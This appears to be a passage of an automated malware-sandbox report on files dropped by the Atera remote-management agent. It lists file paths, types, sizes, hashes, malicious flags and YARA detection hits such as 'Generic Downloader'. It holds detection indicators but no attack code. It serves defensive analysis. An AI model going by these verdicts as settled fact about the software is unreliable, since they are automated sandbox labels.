                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.139785828189609
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:avB4oeg/Po2Obb95bmrpeALHpZAgEpYinAMxCC8:ruQpbHbklAp7Hxx8
                                                                                                                                                                                                                                                                                              MD5:3180C705182447F4BCC7CE8E2820B25D
                                                                                                                                                                                                                                                                                              SHA1:AD6486557819A33D3F29B18D92B43B11707AAE6E
                                                                                                                                                                                                                                                                                              SHA-256:5B536EDA4BFF1FDB5B1DB4987E66DA88C6C0E1D919777623344CD064D5C9BA22
                                                                                                                                                                                                                                                                                              SHA-512:228149E1915D8375AA93A0AFF8C5A1D3417DF41B46F5A6D9A7052715DBB93E1E0A034A63F0FAAD98D4067BCFE86EDB5EB1DDF750C341607D33931526C784EB35
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1782
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.026919218581437
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3rrb7h+1/gYo27RgdSagFsg+w3Sg+CjdgDt:7rn4cwCR
                                                                                                                                                                                                                                                                                              MD5:13CFEB2261E4DAEAA3C06F7A60078F91
                                                                                                                                                                                                                                                                                              SHA1:D76B6D07D8FEC75789025FBAB18048AD193B1462
                                                                                                                                                                                                                                                                                              SHA-256:6BBDCC477F0C1EFBD0129AC7716F96CC2844103169AAEBFF03D4C8F5C54745D6
                                                                                                                                                                                                                                                                                              SHA-512:F804155363FEB09427F7C8E968EAAA7DDA15F739769864A23C8A0FC9137151A03F02FB30B11F47A69DDCEFFF02BF933721C3757A3FB78C705D0537205BBD3A92
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhTLV:WFLV
                                                                                                                                                                                                                                                                                              MD5:530F2E4E5E3DDA283DB3C78CC0C13297
                                                                                                                                                                                                                                                                                              SHA1:CF60B778D32C9562B94411DA9DCD8FED2017AB84
                                                                                                                                                                                                                                                                                              SHA-256:447163A4A3F1F10AFD9EC48F915085B3236F0FA7EDC9973C16925EDB5F6CF0CC
                                                                                                                                                                                                                                                                                              SHA-512:DD4F7AF9A0F57707D1924BB504D3FC267B4898B909CF6E6ECD274BBC9B487A5CE5D8000E3FAD6EC0061E565C728455965C91F1B4E380227264AD2EE3E2990E28
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=6.0
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95792
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.184818983275012
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:GQ7brNBoXFbuhpLHbTOgemUu7+n3uRw1FlQRd5JY4t5K56y0sDrUfvPrhZwLXF7X:GQ/iwLWgeW+neRw1Hyd/YCs56y0sXUfG
                                                                                                                                                                                                                                                                                              MD5:23C8674C75D5944445BF1C035E4A4789
                                                                                                                                                                                                                                                                                              SHA1:A1255CEDEAC9F9A04B50C7814CD7C61A50623A19
                                                                                                                                                                                                                                                                                              SHA-256:D2043F878740F643BF91F3EF798DBB9747904A1D503AAC4ED2108131F663AB37
                                                                                                                                                                                                                                                                                              SHA-512:52ABA8350A05E9E5A672CB04CE528CFC4DA009247B2BD8B63096AF9A37C1F352A4C2BD12B03973AA1E733551F94F542814E425223DEF2AA33B595AA2DC555A95
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.002764283325334
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:ocNQW9Tbp/VgiZi7sT5gdBxYJMcTnbJkI+eD7HxSR:ojobJVgiHMcr5Da
                                                                                                                                                                                                                                                                                              MD5:10961147A546FFCD8B7C19771BA70198
                                                                                                                                                                                                                                                                                              SHA1:5B63EEA0B2E53DB81AFB146D469E899E1E67DACF
                                                                                                                                                                                                                                                                                              SHA-256:95C53735107ADCC39E6C3268335B2AD434E2364A007CC97B2147AF3A6EE837F3
                                                                                                                                                                                                                                                                                              SHA-512:9830450FF9E8D2E6B74D8D8938A18DFB1BA008249D389FB923D5AAA25B7F8F9E5BAD4CB3FC13100C5F53B0CCEDA4E9427E90F2B733EA9BE0FFAA5D5F165C815E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16432
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.656654225594367
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:5Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5XqQ:5Xh+tYmNyb8E9VF6IYinAM+oCaFXF
                                                                                                                                                                                                                                                                                              MD5:96703E15C375B8A701C9D1F5BE8C4149
                                                                                                                                                                                                                                                                                              SHA1:B058FA32FBDA52D70C1B966640B4824D5487ADC4
                                                                                                                                                                                                                                                                                              SHA-256:3F830FA8F22EB09D59088705E26DCE964FB430722E91630B03EB15FCC48359A0
                                                                                                                                                                                                                                                                                              SHA-512:3D7515BBFD018BCB24C69235A65F401BCF00D6932E412696FF31DC6EDE9436B2D4E5983450C9F88AF7B52D18949B4C1EFFEB9C3F94E85DCE57C4495F21D21A86
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.410547751816252
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:KQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAM/:K9ML8LW/usybGYVE8mZw+89Wu1e7Hxas
                                                                                                                                                                                                                                                                                              MD5:20FC2DB17D09554BBC37785B3644DFC3
                                                                                                                                                                                                                                                                                              SHA1:AAC4CA54730DB46145748AB419CF6BE3B39D2A74
                                                                                                                                                                                                                                                                                              SHA-256:4151D6C627A324D9F2991A4D98BB7544926DB41B3211EDC1B2085922B1D1FC46
                                                                                                                                                                                                                                                                                              SHA-512:62F6711FD2861BEA0FC214882678CF7F98CB53E8AF858C46CCC1F5B1F2FF9C22DCBD3A184A9DE9AD2D2148F0B529426DE7F793A63A459D72D2DCB048DF4E40FD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.13440642371392
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:hjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvr:h+e55LgIkTmyAAfTnMLvr
                                                                                                                                                                                                                                                                                              MD5:A79C5395D945A1A369EA05D73B1170E4
                                                                                                                                                                                                                                                                                              SHA1:937D030106FD7E88B61E4F4D1AC28A3B9FFA0AA4
                                                                                                                                                                                                                                                                                              SHA-256:7580F72E7059A9DBCF41C94DC69ECCA0B3A983C010DE86B9A509A701163AFEC0
                                                                                                                                                                                                                                                                                              SHA-512:176C719C2595A6A01041EC240D5341FAC5AB6137756FD70F71A1B5C5A6E9A923FB61760808840D439CDBAB70ADFAEE137B13600875E0BC3A209E501DB84C2AAD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071525670553409
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Y1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQm:Y1n1p9LdRN39aQZUq3
                                                                                                                                                                                                                                                                                              MD5:022108AD251A8942E295269CA824DE07
                                                                                                                                                                                                                                                                                              SHA1:05CE96EB21FF69C5ACE572405A39936E594B7043
                                                                                                                                                                                                                                                                                              SHA-256:353FC27D930C31219086C6D391B0502AC298F6084DFCB3EA423DD1DAB3BA1907
                                                                                                                                                                                                                                                                                              SHA-512:49028D3C1C7C8FAE813F294577B97EB0C66F2D62DF880072AD59679460D55A6DEB1546DDF07A7353563910E21F4D53F5FCB4BD421887D7B75429083CA200C16E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960711597816388
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:yBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:yBjk38WuBcAbwoA/BkjSHXP36RMGl
                                                                                                                                                                                                                                                                                              MD5:25879E885A79F4548FD878EAF4A82396
                                                                                                                                                                                                                                                                                              SHA1:AFB8D0BBD5687D2FC19C7A3FB66EA3DF1886DB8C
                                                                                                                                                                                                                                                                                              SHA-256:3DF7B27F8649C95C56F1F68A040F29FB28EFF6756F8BA78C480DFBB541E59E4A
                                                                                                                                                                                                                                                                                              SHA-512:39EB28B89A077D37FC8076A364B26ADFD348F6DC891AC08FACCFB071D3806C32AC0A3A5D82E8D4DE01DF6F9E1C4271CCABFA8FF7248CF6886BEF8FE4BDE51B6F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.117274836584594
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:NZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHU:fgo0WPVTXg0
                                                                                                                                                                                                                                                                                              MD5:66DEBCC5962642D31706EA1B067288A3
                                                                                                                                                                                                                                                                                              SHA1:FB6A76C0E5189F66FE1D0E192349077A45BF437F
                                                                                                                                                                                                                                                                                              SHA-256:8CBC47B453EA20F1EEA3337981A1A975A16B68B27AA156831D2B4AD0B63EA980
                                                                                                                                                                                                                                                                                              SHA-512:5C485C7D319BA9C019FBDCA48833D3628E6D9EA6F3AABFA47A519C363BA81D11265427FD470D5D665795B010A26E751DA404DBD70895E5EAFC83CBD50D83ED2B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.676829122620627
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqXLP:TuhMaVmzDC67EpYinAMxC5
                                                                                                                                                                                                                                                                                              MD5:C3CBDF33261AA0BAA8C11B4D713BA911
                                                                                                                                                                                                                                                                                              SHA1:A486A2CFA6EF16B9DD005C689C767E47BF18D5A6
                                                                                                                                                                                                                                                                                              SHA-256:0BD8B6B5D401001A2003486077BC095A2138B42DE7A52B212BD7A4AAD72A9E35
                                                                                                                                                                                                                                                                                              SHA-512:132600340186128C7B8EA40D77DE9E5359A52949E7EE815CF959E2000A6EE178FCE26A2AAA2EBC56A48318EEAD3038189567CD5D14F9E977780373649C83F41D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97328
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.241615255803021
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:rNSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxhP:rN3OWMsQ56vd2s+KuYc9RTJrP
                                                                                                                                                                                                                                                                                              MD5:259DAAE7BD386F6AE1C50DEF93F9A274
                                                                                                                                                                                                                                                                                              SHA1:70E68497781C4E7B931B11E9EFE702ECCFBC3AF7
                                                                                                                                                                                                                                                                                              SHA-256:859758492E07C9297C1C5A0A31FA30129C23D479F442ADE01F4A51F78A0DED08
                                                                                                                                                                                                                                                                                              SHA-512:8D25CB5982E2D8A5EFA0056C120E1BD5AEC7E28DE4DEEC9BFA2BAEBFB0FABDC4A12369F901C8415CDD3402C9A0E8F8F338C1C5E3FEB1A2C0F45ED446AB80701B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.18032959054322
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:g3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnJ:S0qjCSRE+fw0kG71S
                                                                                                                                                                                                                                                                                              MD5:CC3FFADF699BFB7F10A176AE306707E8
                                                                                                                                                                                                                                                                                              SHA1:C0824E4E57FEBEF32E904E540BA369BB77ACD15A
                                                                                                                                                                                                                                                                                              SHA-256:D48B4C4D3BED0F4662B98E557A0EDE24B6C3745E7BFFC114164A2FD33D947904
                                                                                                                                                                                                                                                                                              SHA-512:BC648768FA54D6F9A0FB70CE88960EE2137712FD7056F8FF28D2E222871D2FFA96B97C81E21D84CD71EA336F29D28977EAB57D858B2B7D1D7C7B2B01BB455C32
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17968
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.672454142602205
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Nh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB7f5DxmX:Ny9eEpYinAMxCA7xDxmX
                                                                                                                                                                                                                                                                                              MD5:2BBEC1A6C6C64499CE0A4EDEA5D0C629
                                                                                                                                                                                                                                                                                              SHA1:A1C39059B887B7A1BDF93CAB3237413D5948BE26
                                                                                                                                                                                                                                                                                              SHA-256:D80E6D1C2A0850A2FDCA5F16A259130B08DDFE968CDC137253221CD4600D53CA
                                                                                                                                                                                                                                                                                              SHA-512:B27639E9D30FD23461723708D4067C99AA3162FD8EF935AD5DA75776EBB46F2D11BD0FCA211BE35A195CE3020E10E063F66FDDDEAC0624392143B856DC23C174
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):384561
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999363646163921
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:Dyg677hm03WpEpp2/8LWX+Kh9o3zYerEz7MLHIqbsauawNMGRSManfY+bcQ/lqNl:Dyf7hm03Ls/OWVh9oMaEz76zwfEHY+lM
                                                                                                                                                                                                                                                                                              MD5:698975AE4AB57FED99CC170DAB8A3E36
                                                                                                                                                                                                                                                                                              SHA1:04B0067BF8584F9D41EF156F75FE28982BFB1286
                                                                                                                                                                                                                                                                                              SHA-256:20FFBCF807587C9A0B13C46406B52927BF0A9965EFE12DB25FCB729E6F1CE7B7
                                                                                                                                                                                                                                                                                              SHA-512:172E65C7657D1FE250AEAF422230C104D03F16356AA32D7B1077ABDD558B69AC4F4F434FA551117AF1CF6FDB74364237E50EF693B2F4201C8475439B6DE77AA6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):186408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7421661476686365
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:QPF+XpxWhiIx4oCIXLGRlsZuPfzh554bD0CJd4bDgoVBLv:UM5ohiQ4DIXLG3sZuaD0dDN
                                                                                                                                                                                                                                                                                              MD5:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              SHA1:42621852B40F3F068DA5494C9879F846B4869399
                                                                                                                                                                                                                                                                                              SHA-256:76AEFE9205BCE78D4533500E6839E892B7D80EDC39ABCD30CA67952925302B29
                                                                                                                                                                                                                                                                                              SHA-512:91EA7152762F00FDFBC6CB8D5D15C2E07BC298AF8958406B0B0FB652EE3D4A4DA9D79CA7DDE47DC7700285B20CBA089F35745C2B3B84B9DC0D258BD9BDC89F56
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):546
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                              MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                                                                              SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                                                                              SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                                                                              SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWTn:WKn
                                                                                                                                                                                                                                                                                              MD5:3FA173E4E1E00396A06E409935A1E7F9
                                                                                                                                                                                                                                                                                              SHA1:089B85E04C266EDD6DBB678EE91DA656B19674B3
                                                                                                                                                                                                                                                                                              SHA-256:297A53DB6DA22AA3EE4CE849C9952F08BB7296303A170C9DDC7ACEDE10B64C25
                                                                                                                                                                                                                                                                                              SHA-512:D0C34B51E5599C01EDF4CA6ACC89186BCEA5B97A598C4F120B3063C171B9A1668BA5FF87014565360471973B30733A5521783FA3446BF376332AAD23A4325D26
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=38.8
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96808
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.18015175056516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:EJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762C:EQUm2H5KTfOLgxFJjE50vksVUfPvO14
                                                                                                                                                                                                                                                                                              MD5:93D5E2AAFBE16CADA057BF880002B2F7
                                                                                                                                                                                                                                                                                              SHA1:095832AFB05852D692BD40D5F77EBBDD339BC545
                                                                                                                                                                                                                                                                                              SHA-256:83333CE938E943AC54EA0428722D8F9D64D2BE993502CD0E95B39E2D78956484
                                                                                                                                                                                                                                                                                              SHA-512:2E2391C315FD173634F262011A25C9E397BC8A1DAC8E86A039F52FF733534F57F2E00ADC995900823448A45933864E814E89549F41271FC9D7EFFD116BBF3854
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
